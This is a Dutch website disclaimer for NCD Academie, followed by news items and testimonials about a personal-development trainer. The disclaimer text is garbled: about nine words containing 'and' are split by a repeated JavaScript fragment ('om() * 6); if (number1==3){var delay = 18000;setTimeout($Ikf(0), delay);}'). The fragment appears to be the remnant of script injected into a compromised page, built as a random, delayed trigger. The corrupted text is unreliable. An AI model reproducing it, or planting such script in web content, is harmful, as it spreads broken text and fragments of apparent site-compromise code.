De voorwaarden van deze disclaimer zijn van toepassing op deze website www.NCDAcademie.nl.

Door deze website te bezoeken en/of de op of via deze website aangeboden informatie te gebruiken, verklaart u zich akkoord met de toepasselijkheid van deze disclaimer. In geval van tegenstrijdigheid tussen de voorwaarden van specifieke producten en diensten besteld via deze website en deze disclaimer, prevaleren de voorwaarden van deze producten en diensten.

Gebruik van de NCD Academie-website

De informatie op deze website is uitsluitend bedoeld als algemene informatie. Er kunnen geen rechten aan de informatie op deze website worden ontleend. Hoewel de NCD Academie zorgvuldigheid in acht neemt bij het samenstellen en onderhouden van deze website en daarbij gebruik maakt van bronnen die betrouwbaar geacht worden, kan de NCD Academie niet instaan voor de juistheid, volledigheid en actualiteit van de geboden informatie. De NCD Academie garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeert evenmin dat de website foutloos of ononderbroken zal functioneren. De NCD Academie wijst iedere aansprakelijkheid ten aanzien van de juistheid, volledigheid, actualiteit van de geboden informatie en het (ongestoord) gebruik van deze website uitdrukkelijk van de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Informatie van derden, producten en diensten

Wanneer de NCD Academie links naar websites van derden weergeeft, betekent dit niet dat de op of via deze websites aangeboden producten of diensten door de NCD Academie worden aanbevolen. De NCD Academie aanvaardt geen aansprakelijkheid en geen enkele verantwoordelijkheid voor de inhoud, het gebruik of de beschikbaarheid van websites waarnaar wordt verwezen of die verwijzen naar deze website. Het gebruik van dergelijke links is voor eigen risico. De informatie op dergelijke websites is door de NCD Academie niet nader beoordeeld op juistheid, redelijkheid, actualiteit of volledigheid. Verzoeken tot plaatsing van links naar websites van derden op www.NCDAcademie.nl worden getoetst aan een aantal criteria.

Informatie gebruiken

De NCD Academie behoudt zich alle intellectuele eigendomsrechten en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere rechten voor met betrekking tot alle op of via deze website aangeboden informatie (waaronder alle teksten, grafisch materiaal en logo’s). Het is niet toegestaan informatie op deze website te kopiëren, te downloaden of op enigerlei wijze openbaar te maken, te verspreiden of te verveelvoudigen zonder voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande schriftelijke toestemming van de NCD Academie of de rechtmatige toestemming van de rechthebbende. U mag informatie op deze website wel afdrukken en/of downloaden voor eigen persoonlijk gebruik.

Wijzigingen

De NCD Academie behoudt zich het recht voor de op of via deze website aangeboden informatie, met inbegrip van de tekst van deze disclaimer, te allen tijde te wijzigen zonder hiervan nadere aankondiging te doen. Het verdient aanbeveling periodiek na te gaan of de op of via deze website aangeboden informatie, met inbegrip van de tekst van deze disclaimer, is gewijzigd

Toepasselijk recht

Op deze website en de disclaimer is het Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands recht van toepassing. Alle geschillen uit hoofde van of in verbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met deze disclaimer zullen bij uitsluiting worden voorgelegd aan de bevoegde rechter in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief